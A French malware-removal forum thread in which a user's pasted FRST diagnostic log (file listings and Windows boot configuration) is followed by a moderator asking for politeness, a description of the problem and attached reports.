2020-11-18 04:56 - 2020-06-08 14:30 - 000000000 ____D C:\Windows\system32\MRT
2020-11-18 04:53 - 2020-06-08 14:30 - 133736600 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-11-18 04:45 - 2020-05-30 13:27 - 002876928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2020-11-17 19:28 - 2020-06-11 04:43 - 000000000 ____D C:\Users\HP\AppData\Local\.IdentityService
2020-11-17 18:38 - 2020-06-08 12:07 - 000000000 ____D C:\Users\HP\AppData\Local\PlaceholderTileLogoFolder
2020-11-17 18:38 - 2020-05-31 15:41 - 000000000 ____D C:\ProgramData\Packages
2020-11-10 15:39 - 2019-03-19 05:59 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\telnet.exe
2020-11-10 14:28 - 2020-07-29 02:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-11-10 13:34 - 2020-06-28 04:00 - 000000000 ____D C:\Users\HP\Desktop\MAISON DE LA DESTINEE

==================== Fichiers à la racine de certains dossiers ========

2020-06-12 14:26 - 2020-06-12 14:26 - 000000000 _____ () C:\Users\HP\.mongorc.js
2020-12-09 13:07 - 2020-12-09 13:07 - 000032768 _____ () C:\Users\HP\AppData\Roaming\1607515644977-shm
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 _____ () C:\Users\HP\AppData\Roaming\1607515644977-wal
2020-12-09 13:09 - 2020-12-09 13:09 - 000032768 _____ () C:\Users\HP\AppData\Roaming\1607515759026-shm
2020-12-09 13:09 - 2020-12-09 13:09 - 000000000 _____ () C:\Users\HP\AppData\Roaming\1607515759026-wal
2020-12-08 07:58 - 2020-12-08 07:58 - 001551804 _____ () C:\Users\HP\AppData\Roaming\179442746
2020-07-31 11:17 - 2020-12-04 00:46 - 000011890 _____ () C:\Users\HP\AppData\Local\oobelibMkey.log

==================== SigCheckExt =========================

2020-06-09 11:58 - 2019-11-08 10:15 - 003600896 _____ C:\Windows\system32\pwNative.exe
2020-06-11 23:32 - 2010-12-06 03:16 - 000090112 _____ (Vestris Inc.) C:\Windows\system32\Vestris.ResourceLib.dll
2020-12-09 14:22 - 2020-12-09 14:22 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2020-12-09 14:22 - 2020-12-09 14:22 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2000-10-17 06:59 - 2000-10-17 06:59 - 000053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42loc.dll
2000-10-17 06:59 - 2000-10-17 06:59 - 001056768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJET35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJINT35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJTER35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000415504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSREPL35.DLL
2020-12-09 13:01 - 2014-04-03 20:22 - 000645592 _____ C:\Windows\SysWOW64\sqlite3.dll
2000-10-17 06:59 - 2000-10-17 06:59 - 000368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VBAR332.DLL
2020-12-09 15:12 - 2020-12-09 15:13 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\FRST64.exe

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)


==================== BCD ================================

Gestionnaire de d�marrage Windows
---------------------------------
identificateur          {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  fr-FR
inherit                 {globalsettings}
default                 {current}
resumeobject            {c5195d39-a278-11ea-9518-94242a07f8cb}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Chargeur de d�marrage Windows
-----------------------------
identificateur          {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 10
locale                  fr-FR
inherit                 {bootloadersettings}
recoverysequence        {c5195d3b-a278-11ea-9518-94242a07f8cb}
displaymessageoverride  Recovery
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
osdevice                partition=C:
systemroot              \Windows
resumeobject            {c5195d39-a278-11ea-9518-94242a07f8cb}
nx                      OptIn
bootmenupolicy          Standard

Chargeur de d�marrage Windows
-----------------------------
identificateur          {c5195d3b-a278-11ea-9518-94242a07f8cb}
device                  ramdisk=[\Device\HarddiskVolume1]\Recovery\WindowsRE\Winre.wim,{c5195d3c-a278-11ea-9518-94242a07f8cb}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  fr-fr
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume1]\Recovery\WindowsRE\Winre.wim,{c5195d3c-a278-11ea-9518-94242a07f8cb}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Reprendre � partir de la mise en veille prolong�e
-------------------------------------------------
identificateur          {c5195d39-a278-11ea-9518-94242a07f8cb}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  fr-FR
inherit                 {resumeloadersettings}
recoverysequence        {c5195d3b-a278-11ea-9518-94242a07f8cb}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Testeur de m�moire Windows
--------------------------
identificateur          {memdiag}
device                  partition=\Device\HarddiskVolume1
path                    \boot\memtest.exe
description             Diagnostics m�moire Windows
locale                  fr-FR
inherit                 {globalsettings}
badmemoryaccess         Yes

Param�tres EMS
--------------
identificateur          {emssettings}
bootems                 No

Param�tres du d�bogueur
-----------------------
identificateur          {dbgsettings}
debugtype               Local

Erreurs de m�moire RAM
----------------------
identificateur          {badmemory}

Param�tres globaux
------------------
identificateur          {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Param�tres du chargeur de d�marrage
-----------------------------------
identificateur          {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Param�tres de l'hyperviseur
-------------------
identificateur          {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Param�tres du chargeur de reprise
---------------------------------
identificateur          {resumeloadersettings}
inherit                 {globalsettings}

Options de p�riph�rique
-----------------------
identificateur          {c5195d3c-a278-11ea-9518-94242a07f8cb}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume1
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

==================== Fin de FRST.txt ========================
Malekal_morte
Messages : 108314
Inscription : 10 sept. 2005 13:57

Re: INTERPRETER RAPPORT FRST

par Malekal_morte »

Salut,

1) Merci de faire usage de politesse
2) Merci d'expliquer les problèmes rencontrés
3) Merci d'attacher les rapports en pièce jointe du message ou d'utiliser https://pjjoint.malekal.com/ pour faciliter la lecture
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »